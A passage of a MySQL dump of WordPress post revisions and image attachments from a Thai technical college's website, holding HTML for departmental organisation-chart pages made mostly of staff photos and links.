style=\"color: #ff0000;\"> - <a style=\"color: #ff0000;\" href=\"/wp-content/uploads/2018/03/ขั้นตอนการจัดทำSPEC.pdf\">ขั้นตอนการจัดทำSPEC</a></span>\r\n\r\n<span style=\"color: #ff0000;\"> - <a style=\"color: #ff0000;\" href=\"/wp-content/uploads/2018/03/ข้อมูลประกอบการจัดทำคุณลักษณะเฉพาะครุภัณฑ์.doc\">ข้อมูลประกอบการจัดทำคุณลักษณะเฉพาะครุภัณฑ์</a></span>\r\n\r\n<span style=\"color: #ff0000;\"> - <a style=\"color: #ff0000;\" href=\"/wp-content/uploads/2018/03/ตัวอย่างรายงานผลการจัดทำคุณลักษณะเฉพาะครุภัณฑ์-_.doc\">ตัวอย่างรายงานผลการจัดทำคุณลักษณะเฉพาะครุภัณฑ์ </a></span>\r\n\r\n ', 'งานพัสดุ', '', 'inherit', 'closed', 'closed', '', '1545-revision-v1', '', '', '2018-03-07 13:27:58', '2018-03-07 06:27:58', '', 1545, 'http://www.technicrayong.ac.th/1545-revision-v1/', 0, 'revision', '', 0),
(1614, 3, '2018-03-07 13:35:47', '2018-03-07 06:35:47', '', '7-3-2561 13-37-08', '', 'inherit', 'closed', 'closed', '', '7-3-2561-13-37-08', '', '', '2018-03-07 13:35:47', '2018-03-07 06:35:47', '', 1451, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/7-3-2561-13-37-08.jpg', 0, 'attachment', 'image/jpeg', 0),
(1615, 3, '2018-03-07 13:35:50', '2018-03-07 06:35:50', '', '7-3-2561 13-35-56', '', 'inherit', 'closed', 'closed', '', '7-3-2561-13-35-56', '', '', '2018-03-07 13:35:50', '2018-03-07 06:35:50', '', 1451, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/7-3-2561-13-35-56.jpg', 0, 'attachment', 'image/jpeg', 0),
(1617, 3, '2018-03-07 13:37:04', '2018-03-07 06:37:04', '<img class=\"aligncenter size-full wp-image-1614\" src=\"/wp-content/uploads/2018/03/7-3-2561-13-37-08.jpg\" alt=\"\" width=\"194\" height=\"238\" />\r\n\r\n<img class=\"aligncenter wp-image-1493 \" src=\"/wp-content/uploads/2018/03/5-3-2561-14-52-41.jpg\" alt=\"\" width=\"381\" height=\"102\" />\r\n\r\n<img class=\"aligncenter wp-image-1615 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-13-35-56.jpg\" alt=\"\" width=\"495\" height=\"326\" />', 'งานอาคารสถานที่', '', 'inherit', 'closed', 'closed', '', '1572-revision-v1', '', '', '2018-03-07 13:37:04', '2018-03-07 06:37:04', '', 1572, 'http://www.technicrayong.ac.th/1572-revision-v1/', 0, 'revision', '', 0),
(1618, 3, '2018-03-07 13:37:07', '2018-03-07 06:37:07', '<img class=\"aligncenter wp-image-1454 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-10-23-29.jpg\" alt=\"\" width=\"190\" height=\"238\" />\r\n\r\n<img class=\"aligncenter wp-image-1452 \" src=\"/wp-content/uploads/2018/03/นายกิตติพงค์-อุตตมะเวทิน.jpg\" alt=\"\" width=\"376\" height=\"104\" />\r\n\r\n<a href=\"/งานบริหารงานทั่วไป\"><img class=\"aligncenter wp-image-1485 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-45-54.jpg\" alt=\"\" width=\"195\" height=\"238\" /></a>\r\n\r\n<a href=\"/งานบริหารงานทั่วไป\"><img class=\"aligncenter wp-image-1456\" src=\"/wp-content/uploads/2018/03/นางรุจิรดานันท์-พันกาฬสินธุ์.jpg\" alt=\"\" width=\"382\" height=\"107\" /></a><a href=\"/งานบุคลากร\"><img class=\"aligncenter wp-image-1594 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-12-52-34.jpg\" alt=\"\" width=\"899\" height=\"311\" /><img class=\"aligncenter wp-image-1469 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-25-12.jpg\" alt=\"\" width=\"195\" height=\"239\" /></a>\r\n\r\n<a href=\"/งานบุคลากร\"><img class=\"aligncenter wp-image-1467\" src=\"/wp-content/uploads/2018/03/5-3-2561-11-04-59.jpg\" alt=\"\" width=\"376\" height=\"104\" /></a>\r\n\r\n<img class=\"aligncenter wp-image-1597 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-13-01-48.jpg\" alt=\"\" width=\"731\" height=\"315\" />\r\n\r\n<a href=\"/งานการเงิน\"><img class=\"aligncenter wp-image-1600 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-13-06-42.jpg\" alt=\"\" width=\"196\" height=\"244\" /></a>\r\n\r\n<a href=\"/งานการเงิน\"><img class=\"aligncenter wp-image-1473\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-34-40.jpg\" alt=\"\" width=\"375\" height=\"100\" /></a>\r\n\r\n<img class=\"aligncenter wp-image-1590 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-44-12.jpg\" alt=\"\" width=\"675\" height=\"311\" />\r\n\r\n<a href=\"/งานการบัญชี\"><img class=\"aligncenter wp-image-1603 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-13-11-03.jpg\" alt=\"\" width=\"193\" height=\"239\" /></a>\r\n\r\n<a href=\"/งานการบัญชี\"><img class=\"aligncenter wp-image-1478\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-52-08.jpg\" alt=\"\" width=\"375\" height=\"104\" /></a>\r\n\r\n<img class=\"aligncenter wp-image-1592 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-22-38.jpg\" alt=\"\" width=\"455\" height=\"323\" />\r\n\r\n<a href=\"/งานพัสดุ\"><img class=\"aligncenter wp-image-1606 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-13-18-28.jpg\" alt=\"\" width=\"197\" height=\"242\" /></a>\r\n\r\n<a href=\"/งานพัสดุ\"><img class=\"aligncenter wp-image-1483\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-31-01.jpg\" alt=\"\" width=\"376\" height=\"102\" /></a>\r\n\r\n<img class=\"aligncenter wp-image-1607 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-13-23-48.jpg\" alt=\"\" width=\"729\" height=\"625\" />\r\n\r\n<a href=\"/งานอาคารสถานที่\"><img class=\"aligncenter wp-image-1614 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-13-37-08.jpg\" alt=\"\" width=\"194\" height=\"238\" /></a>\r\n\r\n<a href=\"/งานอาคารสถานที่\"><img class=\"aligncenter wp-image-1493\" src=\"/wp-content/uploads/2018/03/5-3-2561-14-52-41.jpg\" alt=\"\" width=\"382\" height=\"102\" /></a>\r\n\r\n<img class=\"aligncenter wp-image-1615 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-13-35-56.jpg\" alt=\"\" width=\"495\" height=\"326\" />\r\n\r\n<a href=\"/งานทะเบียน\"><img class=\"aligncenter wp-image-1495 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-15-41-43.jpg\" alt=\"\" width=\"191\" height=\"238\" /></a>\r\n\r\n<a href=\"/งานทะเบียน\"><img class=\"aligncenter wp-image-1496\" src=\"/wp-content/uploads/2018/03/5-3-2561-15-42-18.jpg\" alt=\"\" width=\"384\" height=\"105\" /></a>\r\n\r\n<img class=\"aligncenter wp-image-1499 size-full\" src=\"/wp-content/uploads/2018/03/6-3-2561-8-52-54.jpg\" alt=\"\" width=\"720\" height=\"633\" />\r\n\r\n<a href=\"/งานประชาสัมพันธ์\"><img class=\"aligncenter wp-image-1502 size-full\" src=\"/wp-content/uploads/2018/03/6-3-2561-9-33-55.jpg\" alt=\"\" width=\"189\" height=\"235\" /></a>\r\n\r\n<a href=\"/งานประชาสัมพันธ์\"><img class=\"aligncenter wp-image-1503\" src=\"/wp-content/uploads/2018/03/6-3-2561-9-34-49.jpg\" alt=\"\" width=\"362\" height=\"98\" /></a>\r\n\r\n<img class=\"aligncenter wp-image-1504\" src=\"/wp-content/uploads/2018/03/6-3-2561-9-38-38.jpg\" alt=\"\" width=\"290\" height=\"347\" />\r\n\r\n \r\n\r\n \r\n\r\n ', 'โครงสร้างฝ่ายบริหารทรัพยากร', '', 'inherit', 'closed', 'closed', '', '1451-revision-v1', '', '', '2018-03-07 13:37:07', '2018-03-07 06:37:07', '', 1451, 'http://www.technicrayong.ac.th/1451-revision-v1/', 0, 'revision', '', 0),
(1619, 3, '2018-03-07 14:03:31', '2018-03-07 07:03:31', '', '7-3-2561 13-46-48', '', 'inherit', 'closed', 'closed', '', '7-3-2561-13-46-48', '', '', '2018-03-07 14:03:31', '2018-03-07 07:03:31', '', 1576, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/7-3-2561-13-46-48.jpg', 0, 'attachment', 'image/jpeg', 0),
(1620, 3, '2018-03-07 14:03:32', '2018-03-07 07:03:32', '', '7-3-2561 13-50-20', '', 'inherit', 'closed', 'closed', '', '7-3-2561-13-50-20', '', '', '2018-03-07 14:03:32', '2018-03-07 07:03:32', '', 1576, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/7-3-2561-13-50-20.jpg', 0, 'attachment', 'image/jpeg', 0),
(1621, 3, '2018-03-07 14:04:42', '2018-03-07 07:04:42', '<img class=\"aligncenter size-full wp-image-1619\" src=\"/wp-content/uploads/2018/03/7-3-2561-13-46-48.jpg\" alt=\"\" width=\"193\" height=\"238\" />\r\n\r\n<img class=\"aligncenter wp-image-1496 \" src=\"/wp-content/uploads/2018/03/5-3-2561-15-42-18.jpg\" alt=\"\" width=\"384\" height=\"105\" />\r\n\r\n<img class=\"aligncenter wp-image-1620 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-13-50-20.jpg\" alt=\"\" width=\"743\" height=\"630\" />\r\n<h3><span style=\"color: #993300;\">** ข้อมูลนักเรียน นักศึกษา ปีการศึกษา 2560</span> <a href=\"/ข้อมูลนักเรียนนักศึกษา60\"><span style=\"color: #ff0000;\">คลิกที่นี่</span></a></h3>\r\n ', 'งานทะเบียน', '', 'inherit', 'closed', 'closed', '', '1576-revision-v1', '', '', '2018-03-07 14:04:42', '2018-03-07 07:04:42', '', 1576, 'http://www.technicrayong.ac.th/1576-revision-v1/', 0, 'revision', '', 0),
(1622, 3, '2018-03-07 14:06:26', '2018-03-07 07:06:26', '<img class=\"aligncenter wp-image-1454 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-10-23-29.jpg\" alt=\"\" width=\"190\" height=\"238\" />\r\n\r\n<img class=\"aligncenter wp-image-1452 \" src=\"/wp-content/uploads/2018/03/นายกิตติพงค์-อุตตมะเวทิน.jpg\" alt=\"\" width=\"376\" height=\"104\" />\r\n\r\n<a href=\"/งานบริหารงานทั่วไป\"><img class=\"aligncenter wp-image-1485 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-45-54.jpg\" alt=\"\" width=\"195\" height=\"238\" /></a>\r\n\r\n<a href=\"/งานบริหารงานทั่วไป\"><img class=\"aligncenter wp-image-1456\" src=\"/wp-content/uploads/2018/03/นางรุจิรดานันท์-พันกาฬสินธุ์.jpg\" alt=\"\" width=\"382\" height=\"107\" /></a><a href=\"/งานบุคลากร\"><img class=\"aligncenter wp-image-1594 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-12-52-34.jpg\" alt=\"\" width=\"899\" height=\"311\" /><img class=\"aligncenter wp-image-1469 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-25-12.jpg\" alt=\"\" width=\"195\" height=\"239\" /></a>\r\n\r\n<a href=\"/งานบุคลากร\"><img class=\"aligncenter wp-image-1467\" src=\"/wp-content/uploads/2018/03/5-3-2561-11-04-59.jpg\" alt=\"\" width=\"376\" height=\"104\" /></a>\r\n\r\n<img class=\"aligncenter wp-image-1597 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-13-01-48.jpg\" alt=\"\" width=\"731\" height=\"315\" />\r\n\r\n<a href=\"/งานการเงิน\"><img class=\"aligncenter wp-image-1600 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-13-06-42.jpg\" alt=\"\" width=\"196\" height=\"244\" /></a>\r\n\r\n<a href=\"/งานการเงิน\"><img class=\"aligncenter wp-image-1473\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-34-40.jpg\" alt=\"\" width=\"375\" height=\"100\" /></a>\r\n\r\n<img class=\"aligncenter wp-image-1590 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-44-12.jpg\" alt=\"\" width=\"675\" height=\"311\" />\r\n\r\n<a href=\"/งานการบัญชี\"><img class=\"aligncenter wp-image-1603 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-13-11-03.jpg\" alt=\"\" width=\"193\" height=\"239\" /></a>\r\n\r\n<a href=\"/งานการบัญชี\"><img class=\"aligncenter wp-image-1478\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-52-08.jpg\" alt=\"\" width=\"375\" height=\"104\" /></a>\r\n\r\n<img class=\"aligncenter wp-image-1592 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-22-38.jpg\" alt=\"\" width=\"455\" height=\"323\" />\r\n\r\n<a href=\"/งานพัสดุ\"><img class=\"aligncenter wp-image-1606 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-13-18-28.jpg\" alt=\"\" width=\"197\" height=\"242\" /></a>\r\n\r\n<a href=\"/งานพัสดุ\"><img class=\"aligncenter wp-image-1483\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-31-01.jpg\" alt=\"\" width=\"376\" height=\"102\" /></a>\r\n\r\n<img class=\"aligncenter wp-image-1607 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-13-23-48.jpg\" alt=\"\" width=\"729\" height=\"625\" />\r\n\r\n<a href=\"/งานอาคารสถานที่\"><img class=\"aligncenter wp-image-1614 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-13-37-08.jpg\" alt=\"\" width=\"194\" height=\"238\" /></a>\r\n\r\n<a href=\"/งานอาคารสถานที่\"><img class=\"aligncenter wp-image-1493\" src=\"/wp-content/uploads/2018/03/5-3-2561-14-52-41.jpg\" alt=\"\" width=\"382\" height=\"102\" /></a>\r\n\r\n<img class=\"aligncenter wp-image-1615 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-13-35-56.jpg\" alt=\"\" width=\"495\" height=\"326\" />\r\n<h6><a href=\"/งานทะเบียน\"><img class=\"aligncenter wp-image-1619 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-13-46-48.jpg\" alt=\"\" width=\"193\" height=\"238\" /></a><a href=\"/งานทะเบียน\"><img class=\"aligncenter wp-image-1496\" src=\"/wp-content/uploads/2018/03/5-3-2561-15-42-18.jpg\" alt=\"\" width=\"384\" height=\"105\" /></a></h6>\r\n<img class=\"aligncenter wp-image-1620 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-13-50-20.jpg\" alt=\"\" width=\"743\" height=\"630\" />\r\n\r\n<a href=\"/งานประชาสัมพันธ์\"><img class=\"aligncenter wp-image-1502 size-full\" src=\"/wp-content/uploads/2018/03/6-3-2561-9-33-55.jpg\" alt=\"\" width=\"189\" height=\"235\" /></a>\r\n\r\n<a href=\"/งานประชาสัมพันธ์\"><img class=\"aligncenter wp-image-1503\" src=\"/wp-content/uploads/2018/03/6-3-2561-9-34-49.jpg\" alt=\"\" width=\"362\" height=\"98\" /></a>\r\n\r\n<img class=\"aligncenter wp-image-1504\" src=\"/wp-content/uploads/2018/03/6-3-2561-9-38-38.jpg\" alt=\"\" width=\"290\" height=\"347\" />\r\n\r\n \r\n\r\n \r\n\r\n ', 'โครงสร้างฝ่ายบริหารทรัพยากร', '', 'inherit', 'closed', 'closed', '', '1451-revision-v1', '', '', '2018-03-07 14:06:26', '2018-03-07 07:06:26', '', 1451, 'http://www.technicrayong.ac.th/1451-revision-v1/', 0, 'revision', '', 0),
(1623, 3, '2018-03-07 14:11:01', '2018-03-07 07:11:01', '', '7-3-2561 14-12-02', '', 'inherit', 'closed', 'closed', '', '7-3-2561-14-12-02', '', '', '2018-03-07 14:11:01', '2018-03-07 07:11:01', '', 1451, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/7-3-2561-14-12-02.jpg', 0, 'attachment', 'image/jpeg', 0),
(1624, 3, '2018-03-07 14:11:56', '2018-03-07 07:11:56', '<img class=\"aligncenter wp-image-1454 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-10-23-29.jpg\" alt=\"\" width=\"190\" height=\"238\" />\r\n\r\n<img class=\"aligncenter wp-image-1452 \" src=\"/wp-content/uploads/2018/03/นายกิตติพงค์-อุตตมะเวทิน.jpg\" alt=\"\" width=\"376\" height=\"104\" />\r\n\r\n<a href=\"/งานบริหารงานทั่วไป\"><img class=\"aligncenter wp-image-1485 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-45-54.jpg\" alt=\"\" width=\"195\" height=\"238\" /></a>\r\n\r\n<a href=\"/งานบริหารงานทั่วไป\"><img class=\"aligncenter wp-image-1456\" src=\"/wp-content/uploads/2018/03/นางรุจิรดานันท์-พันกาฬสินธุ์.jpg\" alt=\"\" width=\"382\" height=\"107\" /></a><a href=\"/งานบุคลากร\"><img class=\"aligncenter wp-image-1594 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-12-52-34.jpg\" alt=\"\" width=\"899\" height=\"311\" /><img class=\"aligncenter wp-image-1469 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-25-12.jpg\" alt=\"\" width=\"195\" height=\"239\" /></a>\r\n\r\n<a href=\"/งานบุคลากร\"><img class=\"aligncenter wp-image-1467\" src=\"/wp-content/uploads/2018/03/5-3-2561-11-04-59.jpg\" alt=\"\" width=\"376\" height=\"104\" /></a>\r\n\r\n<img class=\"aligncenter wp-image-1597 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-13-01-48.jpg\" alt=\"\" width=\"731\" height=\"315\" />\r\n\r\n<a href=\"/งานการเงิน\"><img class=\"aligncenter wp-image-1600 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-13-06-42.jpg\" alt=\"\" width=\"196\" height=\"244\" /></a>\r\n\r\n<a href=\"/งานการเงิน\"><img class=\"aligncenter wp-image-1473\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-34-40.jpg\" alt=\"\" width=\"375\" height=\"100\" /></a>\r\n\r\n<img class=\"aligncenter wp-image-1590 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-44-12.jpg\" alt=\"\" width=\"675\" height=\"311\" />\r\n\r\n<a href=\"/งานการบัญชี\"><img class=\"aligncenter wp-image-1603 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-13-11-03.jpg\" alt=\"\" width=\"193\" height=\"239\" /></a>\r\n\r\n<a href=\"/งานการบัญชี\"><img class=\"aligncenter wp-image-1478\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-52-08.jpg\" alt=\"\" width=\"375\" height=\"104\" /></a>\r\n\r\n<img class=\"aligncenter wp-image-1592 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-22-38.jpg\" alt=\"\" width=\"455\" height=\"323\" />\r\n\r\n<a href=\"/งานพัสดุ\"><img class=\"aligncenter wp-image-1606 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-13-18-28.jpg\" alt=\"\" width=\"197\" height=\"242\" /></a>\r\n\r\n<a href=\"/งานพัสดุ\"><img class=\"aligncenter wp-image-1483\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-31-01.jpg\" alt=\"\" width=\"376\" height=\"102\" /></a>\r\n\r\n<img class=\"aligncenter wp-image-1607 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-13-23-48.jpg\" alt=\"\" width=\"729\" height=\"625\" />\r\n\r\n<a href=\"/งานอาคารสถานที่\"><img class=\"aligncenter wp-image-1614 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-13-37-08.jpg\" alt=\"\" width=\"194\" height=\"238\" /></a>\r\n\r\n<a href=\"/งานอาคารสถานที่\"><img class=\"aligncenter wp-image-1493\" src=\"/wp-content/uploads/2018/03/5-3-2561-14-52-41.jpg\" alt=\"\" width=\"382\" height=\"102\" /></a>\r\n\r\n<img class=\"aligncenter wp-image-1615 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-13-35-56.jpg\" alt=\"\" width=\"495\" height=\"326\" />\r\n<h6><a href=\"/งานทะเบียน\"><img class=\"aligncenter wp-image-1619 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-13-46-48.jpg\" alt=\"\" width=\"193\" height=\"238\" /></a><a href=\"/งานทะเบียน\"><img class=\"aligncenter wp-image-1496\" src=\"/wp-content/uploads/2018/03/5-3-2561-15-42-18.jpg\" alt=\"\" width=\"384\" height=\"105\" /></a></h6>\r\n<img class=\"aligncenter wp-image-1620 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-13-50-20.jpg\" alt=\"\" width=\"743\" height=\"630\" />\r\n\r\n<a href=\"/งานประชาสัมพันธ์\"><img class=\"aligncenter wp-image-1623 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-12-02.jpg\" alt=\"\" width=\"195\" height=\"241\" /></a>\r\n\r\n<a href=\"/งานประชาสัมพันธ์\"><img class=\"aligncenter wp-image-1503\" src=\"/wp-content/uploads/2018/03/6-3-2561-9-34-49.jpg\" alt=\"\" width=\"362\" height=\"98\" /></a>\r\n\r\n<img class=\"aligncenter wp-image-1504\" src=\"/wp-content/uploads/2018/03/6-3-2561-9-38-38.jpg\" alt=\"\" width=\"290\" height=\"347\" />\r\n\r\n \r\n\r\n \r\n\r\n ', 'โครงสร้างฝ่ายบริหารทรัพยากร', '', 'inherit', 'closed', 'closed', '', '1451-revision-v1', '', '', '2018-03-07 14:11:56', '2018-03-07 07:11:56', '', 1451, 'http://www.technicrayong.ac.th/1451-revision-v1/', 0, 'revision', '', 0),
(1625, 3, '2018-03-07 14:12:10', '2018-03-07 07:12:10', '<img class=\"aligncenter size-full wp-image-1623\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-12-02.jpg\" alt=\"\" width=\"195\" height=\"241\" />\r\n\r\n<img class=\"aligncenter wp-image-1503 \" src=\"/wp-content/uploads/2018/03/6-3-2561-9-34-49.jpg\" alt=\"\" width=\"363\" height=\"98\" />\r\n\r\n<img class=\"aligncenter wp-image-1504 size-full\" src=\"/wp-content/uploads/2018/03/6-3-2561-9-38-38.jpg\" alt=\"\" width=\"285\" height=\"341\" />\r\n\r\n \r\n\r\n ', 'งานประชาสัมพันธ์', '', 'inherit', 'closed', 'closed', '', '1582-revision-v1', '', '', '2018-03-07 14:12:10', '2018-03-07 07:12:10', '', 1582, 'http://www.technicrayong.ac.th/1582-revision-v1/', 0, 'revision', '', 0),
(1626, 3, '2018-03-07 14:17:08', '2018-03-07 07:17:08', '', '7-3-2561 14-17-46', '', 'inherit', 'closed', 'closed', '', '7-3-2561-14-17-46', '', '', '2018-03-07 14:17:08', '2018-03-07 07:17:08', '', 1451, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/7-3-2561-14-17-46.jpg', 0, 'attachment', 'image/jpeg', 0);
INSERT INTO `wp_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(1628, 3, '2018-03-07 14:17:29', '2018-03-07 07:17:29', '<img class=\"aligncenter wp-image-1454 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-10-23-29.jpg\" alt=\"\" width=\"190\" height=\"238\" />\r\n\r\n<img class=\"aligncenter wp-image-1452 \" src=\"/wp-content/uploads/2018/03/นายกิตติพงค์-อุตตมะเวทิน.jpg\" alt=\"\" width=\"376\" height=\"104\" />\r\n\r\n<a href=\"/งานบริหารงานทั่วไป\"><img class=\"aligncenter wp-image-1485 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-45-54.jpg\" alt=\"\" width=\"195\" height=\"238\" /></a>\r\n\r\n<a href=\"/งานบริหารงานทั่วไป\"><img class=\"aligncenter wp-image-1456\" src=\"/wp-content/uploads/2018/03/นางรุจิรดานันท์-พันกาฬสินธุ์.jpg\" alt=\"\" width=\"382\" height=\"107\" /></a><a href=\"/งานบุคลากร\"><img class=\"aligncenter wp-image-1594 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-12-52-34.jpg\" alt=\"\" width=\"899\" height=\"311\" /><img class=\"aligncenter wp-image-1469 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-25-12.jpg\" alt=\"\" width=\"195\" height=\"239\" /></a>\r\n\r\n<a href=\"/งานบุคลากร\"><img class=\"aligncenter wp-image-1467\" src=\"/wp-content/uploads/2018/03/5-3-2561-11-04-59.jpg\" alt=\"\" width=\"376\" height=\"104\" /></a>\r\n\r\n<img class=\"aligncenter wp-image-1597 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-13-01-48.jpg\" alt=\"\" width=\"731\" height=\"315\" />\r\n\r\n<a href=\"/งานการเงิน\"><img class=\"aligncenter wp-image-1600 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-13-06-42.jpg\" alt=\"\" width=\"196\" height=\"244\" /></a>\r\n\r\n<a href=\"/งานการเงิน\"><img class=\"aligncenter wp-image-1473\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-34-40.jpg\" alt=\"\" width=\"375\" height=\"100\" /></a>\r\n\r\n<img class=\"aligncenter wp-image-1590 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-44-12.jpg\" alt=\"\" width=\"675\" height=\"311\" />\r\n\r\n<a href=\"/งานการบัญชี\"><img class=\"aligncenter wp-image-1603 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-13-11-03.jpg\" alt=\"\" width=\"193\" height=\"239\" /></a>\r\n\r\n<a href=\"/งานการบัญชี\"><img class=\"aligncenter wp-image-1478\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-52-08.jpg\" alt=\"\" width=\"375\" height=\"104\" /></a>\r\n\r\n<img class=\"aligncenter wp-image-1592 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-22-38.jpg\" alt=\"\" width=\"455\" height=\"323\" />\r\n\r\n<a href=\"/งานพัสดุ\"><img class=\"aligncenter wp-image-1606 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-13-18-28.jpg\" alt=\"\" width=\"197\" height=\"242\" /></a>\r\n\r\n<a href=\"/งานพัสดุ\"><img class=\"aligncenter wp-image-1483\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-31-01.jpg\" alt=\"\" width=\"376\" height=\"102\" /></a>\r\n\r\n<img class=\"aligncenter wp-image-1607 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-13-23-48.jpg\" alt=\"\" width=\"729\" height=\"625\" />\r\n\r\n<a href=\"/งานอาคารสถานที่\"><img class=\"aligncenter wp-image-1614 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-13-37-08.jpg\" alt=\"\" width=\"194\" height=\"238\" /></a>\r\n\r\n<a href=\"/งานอาคารสถานที่\"><img class=\"aligncenter wp-image-1493\" src=\"/wp-content/uploads/2018/03/5-3-2561-14-52-41.jpg\" alt=\"\" width=\"382\" height=\"102\" /></a>\r\n\r\n<img class=\"aligncenter wp-image-1615 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-13-35-56.jpg\" alt=\"\" width=\"495\" height=\"326\" />\r\n<h6><a href=\"/งานทะเบียน\"><img class=\"aligncenter wp-image-1619 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-13-46-48.jpg\" alt=\"\" width=\"193\" height=\"238\" /></a><a href=\"/งานทะเบียน\"><img class=\"aligncenter wp-image-1496\" src=\"/wp-content/uploads/2018/03/5-3-2561-15-42-18.jpg\" alt=\"\" width=\"384\" height=\"105\" /></a></h6>\r\n<img class=\"aligncenter wp-image-1620 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-13-50-20.jpg\" alt=\"\" width=\"743\" height=\"630\" />\r\n\r\n<a href=\"/งานประชาสัมพันธ์\"><img class=\"aligncenter wp-image-1623 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-12-02.jpg\" alt=\"\" width=\"195\" height=\"241\" /></a>\r\n\r\n<a href=\"/งานประชาสัมพันธ์\"><img class=\"aligncenter wp-image-1503\" src=\"/wp-content/uploads/2018/03/6-3-2561-9-34-49.jpg\" alt=\"\" width=\"362\" height=\"98\" /></a>\r\n\r\n<img class=\"aligncenter wp-image-1626 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-17-46.jpg\" alt=\"\" width=\"244\" height=\"311\" />\r\n\r\n \r\n\r\n \r\n\r\n ', 'โครงสร้างฝ่ายบริหารทรัพยากร', '', 'inherit', 'closed', 'closed', '', '1451-revision-v1', '', '', '2018-03-07 14:17:29', '2018-03-07 07:17:29', '', 1451, 'http://www.technicrayong.ac.th/1451-revision-v1/', 0, 'revision', '', 0),
